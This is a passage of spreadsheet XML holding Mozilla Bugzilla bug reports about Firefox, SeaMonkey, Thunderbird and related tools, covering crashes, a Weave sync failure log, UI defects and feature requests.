we need this so beard can change the spam mail filter work for non ascii</t>
  </si>
  <si>
    <t>FIREFOX-389274</t>
  </si>
  <si>
    <t>[FIX]Midas demo. (designMode) fails to work properly after restoring with session restore</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
This is spun off from bug 385882.
Steps to reproduce:
1. Tools &gt; Options &gt; Main &gt; Choose Show my windows and tabs from last time
2. Go to http://www.mozilla.org/editor/midasdemo/ and input some text.
3. File &gt; Quit
4. Reopen Firefox and try typing into the editor.
Actual results:
The text that was in the editor is NOT restored and you cannot type anything in the editor. An error is also in the Error Console:
Error: uncaught exception: Permission denied to set property HTMLDocument.designMode
Expected results:
Text is restored and I'm able to edit it. 
This regressed on BRANCH between 2007-07-11-03 and 2007-07-12-03: http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=PhoenixTinderbox&amp;branch=MOZILLA_1_8_BRANCH&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-07-11+02&amp;maxdate=2007-07-12+04&amp;cvsroot=%2Fcvsroot.
This issue has been around on trunk since at least 2007-01-01-04 FWIW.</t>
  </si>
  <si>
    <t>SEAMONKEY-281375</t>
  </si>
  <si>
    <t>[BEOS] Implement toolkit/xre and xpfe/bootstrap native app support</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.8b) Gecko/20050202 Firefox/1.0+
Build Identifier: 
BeOS is currently contaminating nsAppRunner with code that should live in the
nativeAppSupport. Nobody wants that and moving it to where it belongs help me do
a lot of clever stuff (TM).
I will provide patches for this shortly.
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-98123</t>
  </si>
  <si>
    <t>Create a user preferences infrastructure (became 'General Settings')</t>
  </si>
  <si>
    <t>Originally it was thought that the emailprefs table would also hold general
prefs.  The thinking has changed and we need a general prefs table.  See bug
73665 for the emailprefs table.
user prefs such as the one in bug 7710 would go here.  The 'mybugslink' from
profiles table might also want to get moved here.  And any new user prefs should
go here as well.  Mark dependencies as needed.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-425704</t>
  </si>
  <si>
    <t>[ro] Update Wikipedia searchplugin to match title add search suggest etc</t>
  </si>
  <si>
    <t>Wikipedia changed their site to say (ab-CD) mind creating a patch to reflect that?
You can find the exact title by going to http://ro.wikipedia.org/ view source find the rel=search link and pick its title.
Wikipedia Ã®n RomÃ¢nÄƒ should be Wikipedia (ro) according to my latest check.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-472982</t>
  </si>
  <si>
    <t>Syncing fails: (NS_ERROR_FAILURE) [nsIJSON.decode]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20090109 Shiretoko/3.1b3pre Ubiquity/0.1.4
Build Identifier: 0.2.98
I try to sync but I don't get new changes from the the other computer that synced earlier.  See the attached log.
Reproducible: Always
Steps to Reproduce:
1. Upgraded client to 0.2.98
2. Upgraded weave account to 0.3
3. Sync
Actual Results:  
Sync fails (see log)
Expected Results:  
Sync works.
2009-01-10 14:56:56	Chrome.Window	INFO	User string: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20090109 Shiretoko/3.1b3pre Ubiquity/0.1.4
2009-01-10 14:56:56	Chrome.Window	INFO	Weave version: 0.2.98
2009-01-10 14:56:56	Service.Util	TRACE	Setting 'Mozilla Services Password' password for user xxx
2009-01-10 14:56:57	Service.Util	TRACE	Setting 'Mozilla Services Encryption Passphrase' password for user xxx
2009-01-10 14:56:57	Service.Main	DEBUG	Logging in user xxx
2009-01-10 14:56:57	Service.Main	DEBUG	Event: weave:service:verify-login:start
2009-01-10 14:56:57	Service.Main	DEBUG	Verifying login for user xxx
2009-01-10 14:56:57	Net.Resource	DEBUG	GET request for https://services.mozilla.com/0.3/user/xxx
2009-01-10 14:56:57	Net.Resource	DEBUG	GET request successful (200)
2009-01-10 14:56:57	Service.Main	DEBUG	Event: weave:service:verify-login:success
2009-01-10 14:56:57	Service.Main	DEBUG	Event: weave:service:login:success
2009-01-10 14:56:57	Chrome.Window	INFO	Login successful
2009-01-10 14:56:59	Chrome.Login	TRACE	Sync login window closed
2009-01-10 14:57:17	Service.Main	DEBUG	Event: weave:service:sync:start
2009-01-10 14:57:17	PubKeyManager	TRACE	Importing key: https://services.mozilla.com/0.3/user/xxx/keys/pubkey
2009-01-10 14:57:17	Record.PubKey	DEBUG	GET request for https://services.mozilla.com/0.3/user/xxx/keys/pubkey
2009-01-10 14:57:17	Record.PubKey	DEBUG	GET request successful (200)
2009-01-10 14:57:17	PrivKeyManager	TRACE	Importing key: https://services.mozilla.com/0.3/user/xxx/keys/privkey
2009-01-10 14:57:18	Record.PrivKey	DEBUG	GET request for https://services.mozilla.com/0.3/user/xxx/keys/privkey
2009-01-10 14:57:18	Record.PrivKey	DEBUG	GET request successful (200)
2009-01-10 14:57:18	Service.Main	DEBUG	Refreshing client list
2009-01-10 14:57:18	Engine.Clients	DEBUG	Event: weave:clients:sync:start
2009-01-10 14:57:18	Engine.Clients	DEBUG	Ensuring server crypto records are there
2009-01-10 14:57:18	RecordMgr	TRACE	Importing record: https://services.mozilla.com/0.3/user/xxx/crypto/clients
2009-01-10 14:57:18	Record.CryptoMeta	DEBUG	GET request for https://services.mozilla.com/0.3/user/xxx/crypto/clients
2009-01-10 14:57:18	Record.CryptoMeta	DEBUG	GET request successful (200)
2009-01-10 14:57:18	Engine.Clients	INFO	First sync uploading all items
2009-01-10 14:57:18	Engine.Clients	INFO	1 outgoing items pre-reconciliation
2009-01-10 14:57:18	Engine.Clients	DEBUG	Downloading &amp; applying server changes
2009-01-10 14:57:19	Collection	DEBUG	GET request for https://services.mozilla.com/0.3/user/xxx/clients/?full=1&amp;sort=depthindex
2009-01-10 14:57:19	Collection	DEBUG	GET request successful (200)
2009-01-10 14:57:19	Store.Clients.Store	DEBUG	Saving client list to disk
2009-01-10 14:57:19	Engine.Clients	DEBUG	Preparing 1 outgoing records
2009-01-10 14:57:19	Engine.Clients	DEBUG	Uploading 1 records + 0 index/depth records)
2009-01-10 14:57:19	Collection	DEBUG	POST request for https://services.mozilla.com/0.3/user/xxx/clients/
2009-01-10 14:57:19	Collection	DEBUG	POST request successful (200)
2009-01-10 14:57:19	Engine.Clients	DEBUG	Finishing up sync
2009-01-10 14:57:19	Engine.Clients	DEBUG	Event: weave:clients:sync:success
2009-01-10 14:57:19	Service.Main	DEBUG	Syncing engine bookmarks
2009-01-10 14:57:19	Service.Main	DEBUG	Event: weave:service:bookmarks-engine:sync:start
2009-01-10 14:57:19	Engine.Bookmarks	DEBUG	Event: weave:bookmarks:sync:start
2009-01-10 14:57:19	Engine.Bookmarks	DEBUG	Ensuring server crypto records are there
2009-01-10 14:57:19	RecordMgr	TRACE	Importing record: https://services.mozilla.com/0.3/user/xxx/crypto/bookmarks
2009-01-10 14:57:20	Record.CryptoMeta	DEBUG	GET request for https://services.mozilla.com/0.3/user/xxx/crypto/bookmarks
2009-01-10 14:57:20	Record.CryptoMeta	DEBUG	GET request successful (200)
2009-01-10 14:57:20	Engine.Bookmarks	INFO	30760 outgoing items pre-reconciliation
2009-01-10 14:57:20	Engine.Bookmarks	DEBUG	Downloading &amp; applying server changes
2009-01-10 14:57:22	Collection	DEBUG	GET request for https://services.mozilla.com/0.3/user/xxx/bookmarks/?modified=1230665570000&amp;full=1&amp;sort=depthindex
2009-01-10 14:57:22	Collection	DEBUG	GET request successful (502)
2009-01-10 14:57:22	Engine.Bookmarks	WARN	Sync failed
2009-01-10 14:57:22	Engine.Bookmarks	DEBUG	Event: weave:bookmarks:sync:error
2009-01-10 14:57:22	FaultTolerance	DEBUG	
Original exception: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIJSON.decode] (JS frame :: file:///Users/xxx/Library/Application%20Support/Firefox/Profiles/hmunn5r9.default/extensions/%7B340c2bbc-ce74-4362-90b5-7c26312808ef%7D/modules/resource.js :: JsonFilter_afterGET :: line 348)
Async stack trace:
module:engines.js:153 :: Engine_sync
module:service.js:678 :: WeaveSvc__syncEngine
module:wrap.js:94 :: WeaveNotifyWrapper
module:service.js:578 :: WeaveSvc__sync
module:util.js:501 :: EL_notify
Last callback created at module:wrap.js:93 :: WeaveNotifyWrapper
2009-01-10 14:57:22	Service.Main	DEBUG	Event: weave:service:bookmarks-engine:sync:success
2009-01-10 14:57:22	Service.Main	WARN	Some engines did not sync correctly
2009-01-10 14:57:22	Service.Main	DEBUG	Event: weave:service:sync:success</t>
  </si>
  <si>
    <t>CORE-501479</t>
  </si>
  <si>
    <t>Make it possible to write an xpcshell testcase for both client and server processes</t>
  </si>
  <si>
    <t>In order to prototype and test electrolysis it would be really nice to be able to write an xpcshell script (or something similar) which could partly operate in the child process.
For example:
child: get value of some pref
child: install pref listener
parent: change pref value
child: verify that pref listener fired
I'm not exactly sure how to do this... we may need to spin the event loop at various point where we currently don't need to in xpcshell (or maybe we can require that the script spins the event loop manually as they do today).
bent volunteered to try this but if you get stuck feel free to bump it back to me.</t>
  </si>
  <si>
    <t>FIREFOX-414549</t>
  </si>
  <si>
    <t>bad index in nested loops in refreshVisibleSection hangs on infinite loop</t>
  </si>
  <si>
    <t>Created attachment 299995
fix nested loops indexes
While working on Bug 402486 i ended up into a js hang the script was looping continuously into restore selection loop of _refreshVisibleSection (treeView.js)
we are doing something like this there
for (var i = 0 i &lt; previouslySelectedNodes.length i++) {
  [...]
  for (i=0 i &lt; newElements.length  i++) {
  [...]
  }
}
if i'm not wrong *i* should be something else into the nested loops</t>
  </si>
  <si>
    <t>SEAMONKEY-235762</t>
  </si>
  <si>
    <t>Identity should use the account preferences instead of the default ones</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7a) Gecko/20040219
Mozilla Thunderbird 0.5+ (20040226)
After a new identity for an existing account is created without specifying an
SMTP server the composed mail is actually send over the standard SMTP server.
That shouldn't be. Instead the SMTP server from the POP account this identity
is assigned should be used.
user_pref(mail.identity.id101.fullName Identity 2)
user_pref(mail.identity.id101.useremail foo@foo.com)
...
user_pref(mail.account.account5.identities id4id101)
With this configuration the SMTP server from account 5 is not used instead the
default SMTP server is taken. This is definitely the wrong behavior. For
example: The default SMTP server allows only one hard coded address where
instead the SMTP server from account 5 allows as many addresses as you want. So
you arn't able to send your message because the default SMTP server does not
accept the senders address.</t>
  </si>
  <si>
    <t>SEAMONKEY-461667</t>
  </si>
  <si>
    <t>Add a shortcut for Rewrap</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12
Thunderbird added a shortcut for Edit &gt; Rewrap in bug 256820 (which didn't work until bug 451333 was fixed). This bug is for porting the functionality to the suite.
Reproducible: Always</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-457761</t>
  </si>
  <si>
    <t>Update restriction settings for MDC Deki server</t>
  </si>
  <si>
    <t>We need to revise the configuration of a couple of permission settings.  These need to be changed by executing SQL commands as follows:
update restrictions
set restriction_perm_flags = 1039
where restriction_name = 'Semi-Public'
update restrictions
set restriction_perm_flags = 1025
where restriction_name = 'Private'
This will fix a problem with admins losing their access to certain areas when changing a page's permissions.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-381789</t>
  </si>
  <si>
    <t>Create UA sniffing on 1.5 updated.html to support beta program content</t>
  </si>
  <si>
    <t>We don't have the luxury of using separate files and server side rewrites for 1.5.0.x (like we do for 2.0.0.x) since that version uses single files for all point releases.
In order to provide beta users the correct message for the 1.5.0.12rc we need to check for that version in the UA string and use JS to display the correct content which will be similar to:
https://www.trunk.stage.mozilla.com/en-US/firefox/2.0.0.4rc/whatsnew/
Does anyone know what file is equivalent for the 2.0.0.x releasenotes or exactly what pages show up after install and/or update on 1.5.0.x?  It will be nice to also port the link below for 1.5.0.x users:
https://www.trunk.stage.mozilla.com/en-US/firefox/2.0.0.4rc/releasenotes/</t>
  </si>
  <si>
    <t>FIREFOX-448892</t>
  </si>
  <si>
    <t>setting a property that has only a getter when adding the location bar to the chrome after starting the browser without it</t>
  </si>
  <si>
    <t>Created attachment 332082
patch
Technically this is a regression from bug 448885. Before that change the gURLBar getter didn't exist anymore in BrowserToolboxCustomizeDone() because the access in BrowserStartup() would already have deleted it.
Instead of the proposed patch bug 448572 could also be reverted for elements that are accessed at startup anyway.</t>
  </si>
  <si>
    <t>CALENDAR-254737</t>
  </si>
  <si>
    <t>Event Dialog Task Dialog: Clicking repeat number of times doesn't disable repeat until datepicker</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
In the Event Dialog and Task Dialog in the Recurrence tab
Clicking on Number of Times does not disable the datepicker.
Reproducible: Always
Steps to Reproduce:
1. New Event
2. click Recurrence tab
3. check Repeat every
4. select Until radio button
  datepicker becomes enabled
5. select Number of times radio button
Actual Results:  
Datepicker stays enabled
Expected Results:  
Datepicker becomes disabled.
Clicking forever radio button does disable datepicker but not number of times
text box.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-399408</t>
  </si>
  <si>
    <t>QA Kubla</t>
  </si>
  <si>
    <t>This is the tracking bug for a QA Go decision brought to a consensus by clouser/morgamic/myself and any third parties who are currently using Kubla's test instance at https://kubla.sm-cms01.mozilla.com/en-US (and its DE locale).
A decision based on quality isn't I feel limited to QA especially given that webdev and publishers will have a better sense of how ready this is still this bug tracks whether the decision to push into Beta/production has been made.
Test Plan: http://wiki.mozilla.org/Kubla:Test_Plan
As of right now I've completed the URL testing on those listed at: http://wiki.mozilla.org/Kubla:Deployment:UrlsToCheck as well as completed a fair amount of ad-hoc testing.
Remaining items are to:
1) More thoroughly test the publishing side of Kubla itself I appreciate any and all help in testing this as it's a little outside my usual purview as a web-tester.  I can give it a good top-down testing but publishing refinements would likely best originate from the folks who will actually be using this  (This is obviously covered by its Beta period.)
2) Run a link checker that isn't fettered by LDAP auth as Xenu seems to be (clouserw can probably help me with this)
3) Figure out--perhaps on the test plan page itself or just on the Kubla wiki somewhere--what it takes to ship to Beta/production decision-wise how many/what kinds of open bugs will we accept when rolling this out?
I don't really know how we want to track dependencies the query is easy enough (since it's all in the same component) and the bug list small enough that I think we can keep on top by simple queries.
Open and fixed bugs: http://tinyurl.com/338hpp</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-327833</t>
  </si>
  <si>
    <t>In  Failed to load overlay from chrome://browser/content/baseMenuOverlay.xul</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en) AppleWebKit/417.9 (KHTML like Gecko) Safari/417.8
Build Identifier: seamonkey-1.0 built_from_src
When opening Tools/Web/DOM Inspector :
Warning: Failed to load overlay from chrome://browser/content/baseMenuOverlay.xul.
Source File: chrome://inspector/content/inspector.xul
Line: 0
Indeed:
/sw/bld/seamonkey-1.0-1/mozilla# grep -rI baseMenuOverlay *                                  
find . -name 'baseMenuOverlay.*'
extensions/inspector/resources/content/inspector.xul:
/sw/bld/seamonkey-1.0-1/mozilla# find . -name 'baseMenuOverlay.*'
/sw/bld/seamonkey-1.0-1/mozilla# 
Contrasting with:
http://lxr.mozilla.org/mozilla1.8.0/search?string=baseMenuOverlay :
/browser/base/content/baseMenuOverlay.xul line 43 -- 
/browser/base/content/baseMenuOverlay.xul line 44 -- %baseMenuOverlayDTD
/browser/base/content/baseMenuOverlay.xul line 46 -- &lt;overlay id=baseMenuOverlay
/browser/base/content/browser-sets.inc line 339 -- # Used by baseMenuOverlay
/browser/base/content/browser.xul line 50 -- 
/browser/base/content/macBrowserOverlay.xul line 51 -- 
/browser/base/content/viewSourceOverlay.xul line 42 -- 
/browser/components/bookmarks/content/bookmarksManager.xul line 47 -- 
/browser/locales/jar.mn line 8 -- locale/browser/baseMenuOverlay.dtd (%chrome/browser/baseMenuOverlay.dtd)
This is with seamonkey-1.0 straight from mozilla's site:
/sw/bld/seamonkey-1.0-1/mozilla# md5sum /sw/src/seamonkey-1.0.source.tar.bz2 
e4f2edc5b2248d090303c70f5b28f210  /sw/src/seamonkey-1.0.source.tar.bz2
Reproducible: Always
Steps to Reproduce:
1.Build probably irrelevant if not :
2.ConfigureParams: --enable-xft --disable-freetype2 --enable-calendar
--enable-optimize=-O3 -fstrict-aliasing --disable-debug
--enable-application=suite --enable-macos-target=10.4 --enable-prebinding
--enable-default-toolkit=gtk2 --with-pthreads
--with-default-mozilla-five-home=%p/lib/%N --mandir=%p/share/man --enable-strip
--enable-extensions=all --enable-image-decoders=all --enable-ldap-experimental
--enable-xpctools --enable-necko-protocols=all --enable-efence
--enable-native-uconv --enable-ctl --enable-xinerama --with-system-mng
--with-system-jpeg --with-system-png --with-system-zlib --enable-postscript
--enable-ipv6 --enable-tests --with-x --enable-canvas --with-qtdir=%p
--enable-pango --enable-svg --enable-update-packaging --enable-storage
--enable-system-cairo --enable-profilesharing
3.For identical setup grab my .info and .patch files from my experimental
dir:
http://cvs.sourceforge.net/viewcvs.py/fink/experimental/jfmertens/crypto/finkinfo/
and 'fink install seamonkey'
Actual Results:  
cf supra
Expected Results:  
-</t>
  </si>
  <si>
    <t>jfm</t>
  </si>
  <si>
    <t>SEAMONKEY-146820</t>
  </si>
  <si>
    <t>Opening group bookmark hangs browser</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (compatible Konqueror/3 Linux)
BuildID:    20020523161
Opening group bookmarks in Linux RC3 hangs browser.
Reproducible: Always
Steps to Reproduce:
1) Click on a group bookmark on the Personal Toolbar
2) Mozilla RC3 opens the 14 tabs of that group.
3) Starts to download for a few seconds.
4) Then hangs. Left overnight still hung.  Mozilla is unresponsive to keyboard or mouse.
5) Extremely repeatable with more than one group bookmark</t>
  </si>
  <si>
    <t>fargher</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-326811</t>
  </si>
  <si>
    <t>Show extension version in search listings</t>
  </si>
  <si>
    <t>There is a long bar of seemingly wasted space after the extension title in the search listings.  Could the current version of an extension be displayed either directly after the title or perhaps right-aligned?
This would help when searching for the latest versions of extensions which for whatever reason don't behave with the automatic update function of the EM.
Steps to Reproduce:
1. Type an extension title in the Quick Search bar on a.m.o and hit Return.</t>
  </si>
  <si>
    <t>djpohly+bmo</t>
  </si>
  <si>
    <t>TOOLKIT-224406</t>
  </si>
  <si>
    <t>Password manager issues with https://secure.tibia.com</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007
In the page at http://tibia.4players.de/home/?subtopic=account both username
and password are typed into a password-input field. Mozilla is unable to store
this information. Form manager can't capture it either.
Reproducible: Always
Steps to Reproduce:
1. Fill in username &amp; password (just some random stuff)
2. Click OK
3. See that no question about storing the info is asked.
Actual Results:  
The form was send without questions of storing the information.
Expected Results:  
Ask me if I want to store the information that I filled in.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-258771</t>
  </si>
  <si>
    <t>Add ImageLoader extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.7.3) Gecko/20040830 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.7.3) Gecko/20040830 Firefox/0.9.1+
Adding extension
Extension name			: ImageLoader
Version number			: 2004.09.10
Release date			: 2004-09-10
Author name			: Omar Khan
E-mail address			: mromarkhan@rogers.com
URL to extension homepage	: http://visuallinkindicator.mozdev.org/
URL to .xpi file		: http://downloads.mozdev.org/visuallinkindicator/ImageLoader.xpi
Size of .xpi file		: 18 KB
A good description		: Loads an individual image eventhough images turned off
Supported Browsers		: Firefox 0.9+
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>mromarkhan</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-480569</t>
  </si>
  <si>
    <t>file removal and dojo-ified CSS parser</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Build Identifier: changeset:   539:37326bb0925c
- forgot to remove the old filed from the frontspace cleanup
- dojo-ified the thunderhead CSS styling parser
Reproducible: Always</t>
  </si>
  <si>
    <t>rsaccon</t>
  </si>
  <si>
    <t>CORE-241739</t>
  </si>
  <si>
    <t>nsXULDocument seems unable to deal with non-ascii scripts</t>
  </si>
  <si>
    <t>in the OnStreamComplete impl:
3133         nsString stringStr stringStr.AssignWithConversion(string stringLen)
it seems somewhat unlikely that this will do the intended thing for non-ascii
(or non-latin1) scripts.</t>
  </si>
  <si>
    <t>BUGZILLA-191167</t>
  </si>
  <si>
    <t>Add a search function for your documentation subtree</t>
  </si>
  <si>
    <t>I wanted to find some documentation on how to use the keywords - hard   :(
A search function on the documentation tree in the bugzilla website or even the
entire site would have been very helpful.
Or at least use google (like they do it in http://ant.apache.org) - a sample
query would be
http://www.google.com/search?q=keyword+site%3Awww.bugzilla.org&amp;Search=Search</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-233719</t>
  </si>
  <si>
    <t>The website look is broken and the forms don't work</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
This seems a simple case of made for â€œInternet Explorer onlyâ€ but since the
issues seem to be JavaScript related I can't really be sure.
Can anybody confirm this before I contact the web master? Don't want to make a
bogus complaint.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>daf.bugzilla</t>
  </si>
  <si>
    <t>FIREFOX_HEALTH_REPORT_GRAVEYARD-888374</t>
  </si>
  <si>
    <t>Client: Android</t>
  </si>
  <si>
    <t>FIREFOX_HEALTH_REPORT_GRAVEYARD</t>
  </si>
  <si>
    <t>crash [@ android.content.res.Resources$NotFoundException: Resource ID #0x0 at android.content.res.Resources.getValue(Resources.java) ] Clicking link in about:healthreport for Choose what I share</t>
  </si>
  <si>
    <t>On Nightly in about:healthreport if you tap on 'Choose what I share' at the bottom of the page it should link to Settings &gt; Firefox Health Report but it causes a crash.</t>
  </si>
  <si>
    <t>liuche</t>
  </si>
  <si>
    <t>abc</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-464921</t>
  </si>
  <si>
    <t>restructure comm-central's locales/Makefile.in files</t>
  </si>
  <si>
    <t>bug 458014 did some restructuring of the Firefox locales/Makefile.in we should do the same for the comm-central locale Makefiles.</t>
  </si>
  <si>
    <t>CORE-342372</t>
  </si>
  <si>
    <t>[FIX]  does not scroll into view when it receives focus</t>
  </si>
  <si>
    <t xml:space="preserve"> does not scroll into view when it receives focus</t>
  </si>
  <si>
    <t>CORE-758304</t>
  </si>
  <si>
    <t>[Mac] crash in nsAccUtils::IsTextInterfaceSupportCorrect()</t>
  </si>
  <si>
    <t>This crash occur since changeset 9b7bea577a43 for bug 750191. It is caused by the use of a deleted nsAccessible* and only occur in DEBUG.
Patch coming.</t>
  </si>
  <si>
    <t>CORE-464848</t>
  </si>
  <si>
    <t>simple cross-site XHR POST goes off deep end</t>
  </si>
  <si>
    <t>If you do a simple XHR POST without an explicit xhr.setRequestHeader(Content-Type text/plain) you go down the preflight path which is painful.  sicking has more details.</t>
  </si>
  <si>
    <t>CORE-260563</t>
  </si>
  <si>
    <t>Add space before parenthesis in label/value accesskey case</t>
  </si>
  <si>
    <t>When an accesskey character is not in the label the accesskey is appended in
parenthesis after the label.
It looks better when there is a space before the parenthesis. This is currently
not the case when the label uses a value attribute (as opposed to text node
children).</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-484674</t>
  </si>
  <si>
    <t>Make it easy to download official logos for Mozilla products</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.6) Gecko/2009020409 Iceweasel/3.0.6 (Debian-3.0.6-1)
Build Identifier: 
Many people are enthusiastic about Mozilla products and would like to manufacture free publicity for them. In order to do so properly they need high quality official icons readily available for the various products (preferably in different sizes because not everybody can use an image manipulation program...)
Doing a search for logos on mozilla.org yields some Firefox logos so that's pretty nicely covered. Ok looks like there are some Thunderbird logos too here www.mozilla.org/foundation/identity-guidelines/thunderbird.html but only Firefox is mentioned at http://www.mozilla.com/en-US/about/logo/
And maybe the other products too with a logo should be there as well?
Love you guys keep up the great work!
Reproducible: Always</t>
  </si>
  <si>
    <t>starofsouth</t>
  </si>
  <si>
    <t>CORE-502145</t>
  </si>
  <si>
    <t>TM: shortcut lookup flag calculation when on trace</t>
  </si>
  <si>
    <t>Instead of re-calculating lookup flags on trace (Detecting ...) calculate at recording time and just peek into the side exit structure. This is an 8ms perf win on SS on my machine.</t>
  </si>
  <si>
    <t>CORE-119462</t>
  </si>
  <si>
    <t>Background image and bgcolor not displayed</t>
  </si>
  <si>
    <t>Just go to https://www.payplus.at/intro.asp
The background is not displayed - a recent regression.
tested with build 2002011003 on winxp.</t>
  </si>
  <si>
    <t>CORE-187876</t>
  </si>
  <si>
    <t>remove xcDllStore.*</t>
  </si>
  <si>
    <t>As far as I can tell this isn't used for anything.  It's still built on CFM
Mac but it can be removed.</t>
  </si>
  <si>
    <t>THUNDERBIRD-338753</t>
  </si>
  <si>
    <t>don't confuse Sender:-header with From: in quick search thread columns</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.3) Gecko/20060513 Ubuntu/dapper Firefox/1.5.0.3
Build Identifier: the package version is '1.5.0.2-0ubuntu1' - it's from the ubuntu dapper beta
As reported in bug 338748 thunderbird mixes up Sender and From headers.  I have a bunch of messages which have both Sender: and From: headers.  I notice in the 'quick search' box that it's possible to search on Sender.  So I typed in the value that's in the Sender: header of a lot of my email.  To my surprise no messages were found by the search.  I then entered a string which appears only in From: headers of some messages and the Sender quick search matched those messages
Reproducible: Always
Actual Results:  
When you quick search for Sender it doesn't search the Sender headers.  It does search the From headers.  There doesn't seem to be any way to do a quick search against the contents of the Sender: headers.
Expected Results:  
I would expect a quick search for Sender to match Sender.  If I wanted to search the From: headers I would expect that quick search to be called From.</t>
  </si>
  <si>
    <t>dooglus</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-183729</t>
  </si>
  <si>
    <t>Segmentation fault in XftLockFace (.ttf files need to be world-readable)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2b) Gecko/20021029 Phoenix/0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021205
When viewing some pages like http://themes.mozdev.org/themes/earlyblue.html
and http://www.zvon.org/ mozilla crashes.
#0  0x40aef885 in XftLockFace () from /home/jens/garnome/lib/libXft.so.2
#1  0x40abefba in NSGetModule () from /usr/local/mozilla/components/libgfx_gtk.so
#2  0x40abef64 in NSGetModule () from /usr/local/mozilla/components/libgfx_gtk.so
#3  0x40abe40a in NSGetModule () from /usr/local/mozilla/components/libgfx_gtk.so
#4  0x400271cf in nsFontCache::GetMetricsFor () from /usr/local/mozilla/libgkgfx.so
#5  0x4002627e in DeviceContextImpl::GetMetricsFor () from
/usr/local/mozilla/libgkgfx.so
#6  0x40a9ec87 in NSGetModule () from /usr/local/mozilla/components/libgfx_gtk.so
#7  0x41168a36 in NSGetModule () from /usr/local/mozilla/components/libgklayout.so
...
lots of calls to NSGetModule 
...
#78 0x411b0893 in NSGetModule () from /usr/local/mozilla/components/libgklayout.so
#79 0x401848c1 in PL_HandleEvent () from /usr/local/mozilla/libxpcom.so
#80 0x401847c9 in PL_ProcessPendingEvents () from /usr/local/mozilla/libxpcom.so
#81 0x401858bb in nsEventQueueImpl::ProcessPendingEvents () from
/usr/local/mozilla/libxpcom.so
#82 0x40d7b7bd in NSGetModule () from /usr/local/mozilla/components/libwidget_gtk.so
#83 0x40d7b506 in NSGetModule () from /usr/local/mozilla/components/libwidget_gtk.so
#84 0x403a4c90 in g_io_unix_dispatch (source_data=0x816bda0
current_time=0xbffff444 user_data=0x823ff50) at giounix.c:135
#85 0x403a6358 in g_main_dispatch (dispatch_time=0xbffff444) at gmain.c:656
#86 0x403a6963 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#87 0x403a6afc in g_main_run (loop=0x823ff90) at gmain.c:935
#88 0x402c87b7 in gtk_main () at gtkmain.c:524
#89 0x40d7bc2e in NSGetModule () from /usr/local/mozilla/components/libwidget_gtk.so
#90 0x415d6c88 in nsldapi_ld_defaults () from
/usr/local/mozilla/components/libnsappshell.so
#91 0x080526e0 in getCountry ()
#92 0x0805305b in main ()
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>THUNDERBIRD-431439</t>
  </si>
  <si>
    <t>Add about:crashes button in prefs</t>
  </si>
  <si>
    <t>Created attachment 318512
